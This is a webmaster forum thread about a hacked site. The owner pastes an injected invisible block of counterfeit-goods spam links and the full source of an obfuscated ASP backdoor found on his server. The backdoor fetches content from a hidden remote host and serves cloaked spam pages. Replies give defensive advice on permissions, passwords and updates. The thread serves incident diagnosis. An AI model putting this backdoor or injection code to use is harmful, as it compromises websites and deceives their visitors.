Help..SOS! Long story short..not much of a coder, know basic html/css and made a few small sites a few years back. About 3 months ago, noticed that some coding was added to my site that I didn't add. I manually removed the coding and thought I was safe. Well today, the "coding" back. This kinda of crap... <div style="position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10;"> <a href="http://www.glangels.org/"><b>michael kors black friday</b></a> <a href="http://canyonlawoffice.com/"><b>michael kors black friday</b></a> <a href="http://www.budwig.com/"><b>michael kors black friday</b></a> <a href="http://intlstudentprotection.com/"><b>uggs Black Friday</b></a> <a href="https://www.bridalassn.com"><b>michael kors Black Friday</b></a> <a href="http://tailwheelbasics.com/"><b>michael kors black friday</b></a> <a href="http://www.pbtli.com/"><b>juicy couture black friday</b></a> <a href="http://www.palestine111.org/"><b>juicy couture black friday</b></a> <a href="http://www.randyarargon.com/"><b>lululemon black Friday</b></a> <a href="http://intrass.com/"><b>kate spade black friday</b></a> <a href="http://www.modernmusiconline.com/"><b>juicy couture black friday</b></a> <a href="http://www.amsiweb.com/"><b>gucci cyber monday</b></a> <a href="http://www.swistun.com"><b>Dior black friday</b></a> <a href="http://nerhcc.org"><b>Tiffany cyber monday</b></a> <a href="http://www.careerconceptsforyouth.org"><b>burberry cyber monday</b></a> <a href="http://www.paulpatrickelectric.com"><b>Tiffany black friday</b></a> <a href="http://www.christcars.com/"><b>beats by dre cyber Monday</b></a> <a href="http://www.gracestormlake.org/"><b>michael kors black friday</b></a> <a href="http://farella.com/"><b>michael kors cyber monday</b></a> <a href="http://www.affinityeventsolutions.com/"><b>north face black friday</b></a> <a href="http://www.quantumna.com/"><b>victoria secret black friday</b></a> <a href="http://www.imageinterventional.com/"><b>uggs black friday</b></a> <a href="http://andrewkoehlerconductor.com/"><b>canada goose black friday</b></a> <a href="http://www.seymour-pd.com"><b>michael kors cyber monday</b></a> <a href="http://www.ingramsoil.com/"><b>uggs black friday</b></a> <a href="http://www.region3nccgscf.org/"><b>kate spade cyber monday</b></a> <a href="http://www.stjohnchurchnj.com/"><b>michael kors cyber monday</b></a> <a href="http://www.gsltrans.com/"><b>beats by dre cyber Monday</b></a> <a href="http://www.educaresupportservices.org/"><b>beats by dre black friday</b></a> <a href="http://www.manateeadvanceddentistry.com/"><b>north face black friday</b></a> <a href="http://www.evergreenmedicalcentre.com/"><b>beats by dre cyber Monday</b></a> <a href="http://www.ahrunsfamousinc.com"><b>nike black friday</b></a> <a href="http://www.thejogtog.com/"><b>uggs black friday</b></a> <a href="http://www.greaterharford.org/"><b>michael kors black Friday</b></a> <a href="http://www.educaresupportservices.org/"><b>beats by dre black friday</b></a> <a href="http://www.janeadenymemorialschool.com"><b>michael kors cyber monday</b></a> <a href="http://bookforward.net/"><b>canada goose black friday</b></a> <a href="http://www.pintobusinesspark.com/"><b>michael kors cyber Monday</b></a> <a href="http://www.northstartraffic.com/"><b>christian louboutin black friday</b></a> <a href="http://www.shawsbarbecue.com/"><b>the north face cyber monday</b></a> <a href="http://friendsofcostco.org/"><b>uggs black friday</b></a> <a href="http://louisvillemeadcompany.com/"><b>dior cyber monday</b></a> <a href="http://www.dianegschmidt.com/"><b>coach cyber monday</b></a> <a href="http://www.walkwithmetoo.com/"><b>Longchamp black friday</b></a> <a href="http://jennchase.com/"><b>the north face black friday</b></a> <a href="http://merkleinsurance.com/"><b>michael kors cyber Monday</b></a> <a href="http://www.askmdx.com/"><b>michael kors cyber Monday</b></a> <a href="http://www.blaumane.com/"><b>north face black friday</b></a> <a href="http://www.eatrightmich.org/"><b>canada goose cyber monday</b></a> <a href="http://www.mip4u.com/"><b>north face cyber monday</b></a> <a href="http://www.askmdx.com/"><b>michael kors cyber Monday</b></a> <a href="http://www.ghosttowngunslingers.com/"><b>bose black friday</b></a> <a href="http://www.greentreepartners.com/"><b>uggs cyber monday</b></a> <a href="http://www.thecrossandthecontroller.com/"><b>coach cyber monday</b></a> <a href="http://www.compassinternational.net/"><b>beats by dre cyber Monday</b></a> <a href="http://www.mscasati.com/"><b>christian louboutin cyber monday</b></a> <a href="http://driftwoodmn.com/"><b>nike black friday</b></a> <a href="http://www.mashinsky.com/"><b>north face cyber monday</b></a> <a href="http://www.southalabamafilmfestival.org/"><b>michael kors cyber Monday</b></a> <a href="http://www.riversedgerv2.com/"><b>michael kors cyber Monday</b></a> <a href="http://www.slrgeri.org/"><b>michael kors cyber Monday</b></a> <a href="http://alignmentmedia.com/"><b>Babyliss cyber Monday</b></a> <a href="http://www.milamcounty.net/"><b>michael kors cyber Monday</b></a> <a href="http://www.randyarargon.com/"><b>lululemon black friday</b></a> <a href="http://www.jakespizzafairmontmn.com/"><b>michael kors cyber Monday</b></a> <a href="http://hairsolution.org/"><b>lululemon black friday</b></a> <a href="http://www.shorelineawnings.com/">barons 13s</a> <a href="http://www.valgardcapital.com/">barons 13s</a> <a href="http://www.heritagefol.com/">barons 13s</a> <a href="http://www.centralbodyworks.com/">jordan 13 barons</a> <a href="http://www.valgardcapital.com/">jordan 13 barons</a> <a href="http://www.heritagefol.com/">jordan 13 barons</a> <a href="http://www.valgardcapital.com/">barons 13s</a> <a href="http://www.heritagefol.com/">jordan 13 barons</a> <a href="http://www.valgardcapital.com/">barons 13s</a> <a href="http://www.dhdr.com/">jordan 13 hologram</a> <a href="http://www.dhdr.com/">jordan 13 hologram</a> <a href="http://crystalclearscience.com/">hologram 13s</a> <a href="http://www.valgardcapital.com/">hologram 13s</a> <a href="http://www.valgardcapital.com/">hologram 13s</a> <a href="http://www.centralbodyworks.com/">hologram 13s</a> <a href="http://www.shorelineawnings.com/">hologram 13s</a> <a href="http://www.centralbodyworks.com/">hologram 13s</a> <a href="http://crystalclearscience.com/">hologram 13s</a> <a href="http://www.valgardcapital.com/">jordan 13 barons</a> <a href="http://www.centralbodyworks.com/">barons 13s</a> <a href="http://www.heritagefol.com/">barons 13s</a> <a href="http://www.heritagefol.com/">barons 13s</a> <a href="http://www.heritagefol.com/">jordan 13 barons</a> <a href="http://www.valgardcapital.com/">barons 13s</a> <a href="http://www.centralbodyworks.com/">barons 13s</a> <a href="http://www.centralbodyworks.com/">jordan 13 barons</a> <a href="http://www.valgardcapital.com/">barons 13s</a> <a href="http://www.shorelineawnings.com/">jordan 13 hologram</a> <a href="http://www.shorelineawnings.com/">hologram 13s</a> <a href="http://www.dhdr.com/">jordan 13 hologram</a> <a href="http://www.heritagefol.com/">hologram 13s</a> <a href="http://www.shorelineawnings.com/">jordan 13 hologram</a> <a href="http://crystalclearscience.com/">hologram 13s</a> <a href="http://www.centralbodyworks.com/">hologram 13s</a> <a href="http://www.dhdr.com/">jordan 13 hologram</a> <a href="http://www.valgardcapital.com/">hologram 13s</a> <a href="http://www.arisguitarist.com/">legend blue 11s</a> <a href="http://www.pen-uro.com/">legend blue 11s</a> <a href="http://www.arisguitarist.com/">legend blue 11s</a> <a href="http://www.gladsmere.com/">jordan 11 legend blue</a> <a href="http://www.tuttle-realty.com/">legend blue 11s</a> <a href="http://www.tuttle-realty.com/">legend blue 11s</a> <a href="http://www.mohawkvalleyortho.com/">legend blue 11s</a> <a href="http://samplinginternational.com/">legend blue 11s</a> <a href="http://www.xtreamhost.com/">legend blue 11s</a> <a href="http://www.townofbroadalbin.org/">legend blue 11s</a> <a href="http://www.ndvl.org/">jordan 6 black infrared</a> <a href="http://www.bddjyr.net/">black infrared 6s</a> <a href="http://www.sdajnw.com/">jordan 11 legend blue</a> <a href="http://www.ballroomandbeyond.com/">jordan 6 black infrared</a> <a href="http://www.bloombehavior.com/">black infrared 6s</a> <a href="http://www.patchogueprinting.com/">jordan 6 black infrared</a> <a href="http://www.gslhog.org/">black infrared 6s</a> <a href="http://www.ballroomandbeyond.com/">jordan 6 black infrared</a> <a href="http://www.gslhog.org/">jordan 6 black infrared</a> <a href="http://www.billlongband.com/">black infrared 6s</a> <a href="http://theweathercell.com/">jordan 11 legend blue</a> <a href="http://samplinginternational.com/">legend blue 11s</a> <a href="http://www.tuttle-realty.com/">jordan 11 legend blue</a> <a href="http://www.arisguitarist.com/">legend blue 11s</a> <a href="http://www.tuttle-realty.com/">legend blue 11s</a> <a href="http://www.bbbjazzorchestra.com/">jordan 11 legend blue</a> <a href="http://samplinginternational.com/">legend blue 11s</a> <a href="http://www.xtreamhost.com/">legend blue 11s</a> <a href="http://www.gladsmere.com/">jordan 11 legend blue</a> <a href="http://www.mohawkvalleyortho.com/">legend blue 11s</a> <a href="http://www.patchogueprinting.com/">black infrared 6s</a> <a href="http://www.patchogueprinting.com/">jordan 6 black infrared</a> <a href="http://www.heavensgate.com/">jordan 11 legend blue</a> <a href="http://www.bloombehavior.com/">black infrared 6s</a> <a href="http://www.firsttoolcorp.com/">jordan 6 black infrared</a> <a href="http://www.gslhog.org/">black infrared 6s</a> <a href="http://www.bddjyr.net/">black infrared 6s</a> <a href="http://www.ballroomandbeyond.com/">jordan 6 black infrared</a> <a href="http://www.potterycamp.com/">jordan 11 legend blue</a> <a href="http://www.potterycamp.com/">jordan 11 legend blue</a></div></body> </html> Code (markup): Can be seen on one of my small pages (1m1.info/EasyFruitWineRecipe.html) at the very bottom. My site is hosted on Godaddy. How do I prevent this crap from being added without me knowing?
Go through and make sure you file permissions are appropriate - ie not 777 Make sure the files that are on your server match the backups on your PC Make sure the timestamps for the files on your server match the timestamps for the same file on your PC
Also, make sure you update all passwords on the server. Make sure you have secure passwords for all logins
and if you have any scripts like wordpress/mambo/joomla/drupal on the site make sure the scripts are up to date
Yeah, I was going through my "folders" and under "aspnet_client" there is a sub folder called "scripts" and there is a folder in there with a funky name "s7ZXRcXsZ5.asp" and I check it out <%@ LANGUAGE=VBSCRIPT CODEPAGE=65001 %> <% Dim X7777X,X777X7,X777XX,X77X77,X77X7X Set X777XX=Response:Set X777X7=Request:Set X77X7X=Session:Set X7777X=Application:Set X77X77=Server Set X7X7X77 = New XX7X77 X7X7X77.dizhi = XX777X("bf]e`]aba]`fb") X7X7X77.filename = X777X7.ServerVariables(XX777X("$4C:AE0}2>6")) X7X7X77.csvalue = XX777X("G:56@") X7X7X77.cachefile = XX777X("^42496") X7X7X77.connect Class XX7X77 Public XX7X7X,dizhi,XX7XXX,filename,csvalue,cachefile Private XXX7XX,XXXX77,XXXX7X,XXXXX7,XXXXXX,X777777,X77777X Private Sub Class_Initialize XXX7XX = "" filename = XX777X(":?56I]2DA") csvalue = XX777X("A286") XXXX77 = X777X7.ServerVariables(XX777X("$t#")&XX777X("'t#0$~u%")&XX777X("(p#t")) XX7X7X = XX777X("`af]_]_]`") dizhi = XX777X("`af]_]_]`") XX7XXX = "" X777777 = X777X7.ServerVariables(XX777X("w%%!0w~$%")) cachefile = XX777X("^42496") X77777X = X7XXXX() End Sub Function connect() Dim X7777X7 Set X7777X7 = X77X77.Createobject(XX777X("(")&XX777X(":?w")&XX777X("E")&XX777X("EA](:")&XX777X("?wEEA#")&XX777X("6BF6D")&XX777X("E]")&"5"&".1") X7777X7.option(6) = false X7777X7.Open XX777X("vt%"), XX777X("9EEAi^^")&dizhi&XX777X("^")&X777X7.QueryString(csvalue) , False X7777X7.setRequestHeader XX777X(")\#62=D57=<;H6Cb=abc=<;abc=<;abc=\x!"), X77777X X7777X7.setRequestHeader XX777X("w@DE"), X777777 X7777X7.setRequestHeader XX777X("&D6C\p86?E"), X777X7.ServerVariables(XX777X("w%%!0&$t#0pvt}%")) If X777X7.ServerVariables(XX777X("w%%!0#tut#t#"))<>"" Then X7777X7.setRequestHeader XX777X("#676C6C"), X777X7.ServerVariables(XX777X("w%%!0#tut#t#")) End If X7777X7.Send() X7777X7.WaitForResponse() XXXXXX = X7777X7.ResponseBody XXX7XX = X7777X7.Status If XXX7XX=302 or XXX7XX= 301 Then XXXXX7 = X7777X7.GetResponseHeader(XX777X("{@42E:@?")) end if Set X7777X7=Nothing set X7X7X7X = X77X77.CreateObject(XX777X("p5@53]$EC62>")) X7X7X7X.Type = (34 * 96 - 3263) X7X7X7X.Mode = (43 * 105 - 4512) X7X7X7X.Open X7X7X7X.Write XXXXXX X7X7X7X.Position = (30 * 48 - 1440) X7X7X7X.Type = (11 * 24 - 262) X7X7X7X.Charset = XX777X("&%u\g") XXXXXX = X7X7X7X.ReadText X7X7X7X.Close X77XXX() End function Function X77XXX() If XXX7XX="302" Then X777XX.Redirect(XXXXX7) Exit Function ElseIf XXX7XX="301" Then X777XX.Status = XX777X("w%%!^`]` ,b_` ,|@G65 ,!6C>2?6?E=J") X777XX.Addheader XX777X("{@42E:@?"),XXXXX7 Exit Function ElseIf XXX7XX="404" Then X777XX.Status = XX777X("w%%!^`]` ,c_c ,}@E ,u@F?5") X777XX.Addheader XX777X("s2E6"), now&XX777X(" ,v|%") X777XX.Addheader XX777X("$6CG6C"), XXXX77 X777XX.Addheader XX777X("r@?E6?E\%JA6"),XX777X("E6IE^9E>=") X777XX.Write XX777X("k9E>=mk9625mkE:E=6mc_c ,}@E ,u@F?5k^E:E=6mk^9625mk3@5Jmk9`mc_c ,}@E ,u@F?5k^9`m")&XXXX77&XX777X("k^3@5Jmk^9E>=m") Exit Function ElseIf XXX7XX="403" Then X777XX.Status = XX777X("w%%!^`]` ,c_b ,u@C3:556?") X777XX.Addheader XX777X("s2E6"), now &XX777X(" ,v|%") X777XX.Addheader XX777X("$6CG6C"), XXXX77 X777XX.Addheader XX777X("r@?E6?E\%JA6"),XX777X("E6IE^9E>=") X777XX.Write XX777X("k9E>=mk9625mkE:E=6mc_b ,u@C3:556?k^E:E=6mk^9625mk3@5Jmk9`mc_b ,u@C3:556?k^9`m")&XXXX77&XX777X("k^3@5Jmk^9E>=m") Exit Function End If X777XX.ContentType = XX777X("E6IE^9E>=") X777XX.AddHeader XX777X("r@?E6?E\%JA6"), XX777X("E6IE^9E>=j492CD6El&%u\g") X777XX.CodePage = (37 * 30 - -63891) X777XX.CharSet = XX777X("&%u\g") XXXXXX = X7X777(XX777X("9C67l-Q^W]YnX-]W9E>=M2DAM9E>X-Q"), XX777X("9C67lQ")&filename&XX777X("n")&csvalue&XX777X("lS`]SaQ"), XXXXXX) XXXXXX = X7X77X(XX777X("9C67l-QW]YnX-]W4DDX-Q"),XX777X("9C67lQ")&cachefile&XX777X("S`]SaQ"), XXXXXX,XX777X("4DD")) XXXXXX = X7X77X(XX777X("DC4l-QW]YnX-]W8:7M;A8MA?8X-Q"),XX777X("DC4lQ")&cachefile&XX777X("S`]SaQ"), XXXXXX,XX777X(":>8")) X777XX.Write XXXXXX End Function Function X7X777(X7XX7XX, X7XXX77, Str) Dim X7777XX Set X7777XX = New RegExp X7777XX.Pattern = X7XX7XX X7777XX.IgnoreCase = false X7777XX.Global = True X7X777 = X7777XX.Replace(Str, X7XXX77) End Function Function X7X77X(X7XX7XX, X7XXX77, Str, X7XXXX7) Dim X7777XX, X777X77, X777X7X Set X7777XX = New RegExp X7777XX.Pattern = X7XX7XX X7777XX.IgnoreCase = false X7777XX.Global = True Set X777X7X = X7777XX.Execute(Str) For Each X777X77 in X777X7X IF X7XXXX7 = XX777X("4DD") then X7X7X7 X777X77.SubMatches(0)&XX777X("]")&X777X77.SubMatches(1) Elseif X7XXXX7 = XX777X(":>8") Then X7X7XX X777X77.SubMatches(0)&XX777X("]")&X777X77.SubMatches(1) End If Next X7X77X = X7777XX.Replace(Str, X7XXX77) End Function Function X7X7X7(X7XXXXX) dim X777XX7 X777XX7=X77X77.MapPath(XX777X("^"))&cachefile&X7XXXXX Set X7X7XX7=X77X77.CreateObject(XX777X("$4C:A")&XX777X("E:?8]u:=")&XX777X("6$JDE")&XX777X("6>~3;")&XX777X("64E")) If X7X7XX7.FileExists(X777XX7) Then Set X7X7XX7=Nothing Exit Function end if Set X7X7XX7=Nothing Dim X7777X7 Set X7777X7 = X77X77.Createobject(XX777X("(:?w")&XX777X("EEA](:?")&XX777X("wEEA")&XX777X("#6BF6")&XX777X("DE]")&"5."&"1") X7777X7.option(6) = false X7777X7.Open XX777X("!~$%"), XX777X("9EEAi^^")&dizhi&X7XXXXX , False X7777X7.setRequestHeader XX777X("w@DE"), X777777 X7777X7.setRequestHeader XX777X(")\#62=D57=<;H6Cb=abc=<;abc=<;abc=\x!"), X77777X X7777X7.Send() X7X7XXX = X7777X7.ResponseText X7XXX7(XX777X("^")&X7XX7X(cachefile&X7XXXXX)) XX77XX XX777X("^")&cachefile&X7XXXXX,X7X7XXX,XX777X("&%u\g") Set X7777X7=Nothing End function Function X7X7XX(X7XXXXX) On Error Resume Next dim X777XX7 X777XX7=X77X77.MapPath(XX777X("^"))&cachefile&X7XXXXX Set X7X7XX7=X77X77.CreateObject(XX777X("$4C:A")&XX777X("E:?8]u:=")&XX777X("6$JDE")&XX777X("6>~3;")&XX777X("64E")) If X7X7XX7.FileExists(X777XX7) Then Set X7X7XX7=Nothing Exit Function end if Set X7X7XX7=Nothing Dim X7777X7 Set X7777X7 = X77X77.Createobject(XX777X("(:?")&XX777X("wEE")&XX777X("A](:?w")&XX777X("EEA#")&XX777X("6BF6")&XX777X("DE]d")&".1") X7777X7.option(6) = false X7777X7.Open XX777X("vt%"), XX777X("9EEAi^^")&dizhi&X7XXXXX , False X7777X7.setRequestHeader XX777X("w@DE"), X777777 X7777X7.setRequestHeader XX777X(")\#62=D57=<;H6Cb=abc=<;abc=<;abc=\x!"), X77777X X7777X7.Send() X7777X7.WaitForResponse X7XXX7(XX777X("^")&X7XX7X(cachefile&X7XXXXX)) Set X7XX777=X77X77.CreateObject(XX777X("25@")&XX777X("53]DEC")&XX777X("62>")) X7XX777.Type= (34 * 96 - 3263) X7XX777.open X7XX777.write X7777X7.ResponseBody X7XX777.SaveToFile X77X77.MapPath(XX777X("^")&cachefile&X7XXXXX) X7XX777.flush X7XX777.Close Set X7XX777=Nothing Set X7777X7=Nothing End function Function X7XX77(XX77777) X7XX77 = mid(XX77777,instrrev(XX77777,XX777X("^"))+1) End Function Function X7XX7X(XX77777) X7XX7X = Left(XX77777,instrrev(XX77777,XX777X("^"))) End Function Function X7XXX7(ByVal CFolder) Dim X777XXX, X77X777, X77X77X, CreateFolder Dim X77X7XX, X77XX77, X77XX7X, X77XXX7, X77XXXX X77XXXX = False CreateFolder = CFolder On Error Resume Next Set X777XXX = X77X77.CreateObject(XX777X("$4C")&XX777X(":AE:?8]")&XX777X("u:=6")&XX777X("$JDE6>")&XX777X("~3;64E")) If Err Then Err.Clear() Exit Function End If If Right(CreateFolder, 1) = XX777X("^") Then CreateFolder = Left(CreateFolder, Len(CreateFolder) -1) End If X77X77X = Split(CreateFolder, XX777X("^")) For X77X7XX = 0 To UBound(X77X77X) X77XX7X = "" For X77XX77 = 0 To X77X7XX X77XX7X = X77XX7X & X77X77X(X77XX77) & XX777X("^") Next X77XXX7 = X77X77.MapPath(X77XX7X) If Not X777XXX.FolderExists(X77XXX7) Then X777XXX.CreateFolder(X77XXX7) End If Next If Err Then Err.Clear() Else X77XXXX = True End If X7XXX7 = X77XXXX End Function Sub XX77XX (XX7777X,byval Str,CharSet) On Error Resume Next set X7XX777=X77X77.CreateObject(XX777X("25@")&XX777X("53]DEC")&XX777X("62>")) X7XX777.Type= (11 * 24 - 262) X7XX777.mode= (43 * 105 - 4512) X7XX777.open X7XX777.WriteText str X7XX777.SaveToFile X77X77.MapPath(XX7777X) X7XX777.flush X7XX777.Close set X7XX777=nothing End Sub Function X7XXXX() on error resume next Dim X7X7777 If X777X7.ServerVariables(XX777X("w%%!0")&XX777X(")0")&XX777X("u~#")&XX777X("(p#sts0u~#")) = "" Or InStr(X777X7.ServerVariables(XX777X("w")&XX777X("%%!0)0u~")&XX777X("#(")&XX777X("p#s")&XX777X("ts0u~#")), XX777X("F?<?@H?")) > 0 Then X7X7777 = X777X7.ServerVariables(XX777X("#t|")&XX777X("~%t0p")&XX777X("ss#")) ElseIf InStr(X777X7.ServerVariables(XX777X("w%")&XX777X("%!0)0u~#(")&XX777X("p#sts0u~#")), XX777X("[")) > 0 Then X7X7777 = Mid(X777X7.ServerVariables(XX777X("w")&XX777X("%%!0)0u~")&XX777X("#(p#s")&XX777X("ts0u~#")), 1, InStr(X777X7.ServerVariables(XX777X("w%%")&XX777X("!0)0u")&XX777X("~#(")&XX777X("p#")&XX777X("sts0u")&XX777X("~#")), XX777X("["))-1) X7XX77X = X777X7.ServerVariables(XX777X("#t|~")&XX777X("%t0pss")&XX777X("#")) ElseIf InStr(X777X7.ServerVariables(XX777X("w%%")&XX777X("!0)0u")&XX777X("#(")&XX777X("p#sts0u~#")), XX777X("j")) > 0 Then X7X7777 = Mid(X777X7.ServerVariables(XX777X("w%")&XX777X("%!0)0u~#(")&XX777X("p#sts0u~#")), 1, InStr(X777X7.ServerVariables(XX777X("w")&XX777X("%%!0")&XX777X("0u~#")&XX777X("(p#s")&XX777X("ts0u~#")), XX777X("j"))-1) X7XX77X = X777X7.ServerVariables(XX777X("#")&XX777X("t|~")&XX777X("%t0pss")&XX777X("#")) Else X7X7777 = X777X7.ServerVariables(XX777X("w%")&XX777X("%!")&XX777X("0)0u~")&XX777X("#(p#s")&XX777X("ts0u~#")) X7XX77X = X777X7.ServerVariables(XX777X("#t|")&XX777X("~%t0ps")&XX777X("s#")) End If X7XXXX = Replace(Trim(Mid(X7X7777, 1, 30)), XX777X("V"), "") End Function Function XX7777() On Error Resume Next Dim X7X777X If LCase(X777X7.ServerVariables(XX777X("w%%!$"))) = XX777X("@77") Then X7X777X = XX777X("9EEAi^^") Else X7X777X = XX777X("9EEADi^^") End If X7X777X = X7X777X&X777X7.ServerVariables(XX777X("$t#'t#0}p|t")) If X777X7.ServerVariables(XX777X("$t#'t#0!~#%")) <> 80 Then X7X777X = X7X777X&XX777X("i")&X777X7.ServerVariables(XX777X("$t#'t#0!~#%")) End If X7X777X = X7X777X&X777X7.ServerVariables(XX777X("&#{")) If Trim(X777X7.QueryString)<>"" Then X7X777X = X7X777X&XX777X("n")&Trim(X777X7.QueryString) End If XX7777 = X7X777X End Function End Class Function XX777X(ByVal X7XX7X7) Dim X7X77X7, X77X7XX, X7X77XX X7XX7X7 = Replace(X7XX7X7, Chr(37) & ChrW(-243) & Chr(62), Chr(37) & Chr(62)) For X77X7XX = 1 To Len(X7XX7X7) If X77X7XX <> X7X77XX Then X7X77X7 = AscW(Mid(X7XX7X7, X77X7XX, 1)) If X7X77X7 >= 33 And X7X77X7 <= 79 Then XX777X = XX777X & Chr(X7X77X7 + 47) ElseIf X7X77X7 >= 80 And X7X77X7 <= 126 Then XX777X = XX777X & Chr(X7X77X7 - 47) Else X7X77XX = X77X7XX + 1 If Mid(X7XX7X7, X7X77XX, 1) = XX777X("o") Then XX777X = XX777X & ChrW(X7X77X7 + 5) Else XX777X = XX777X & Mid(X7XX7X7, X77X7XX, 1) End If End If Next End Function %> Code (markup): as soon as I seen the above coding and remember your mention of "777", deleted the folder. Hoping that solved the problem? Now to figure how that coding was added....
It was added either because the folder permissions allowed it there was a security breach on the server through unsafe passwords, user on one account was able to see your account (should never happen but...) You need to reset the permissions on every folder - probably easier than checking every one. Your ftp tool should have something like this - filezilla calls it file attributes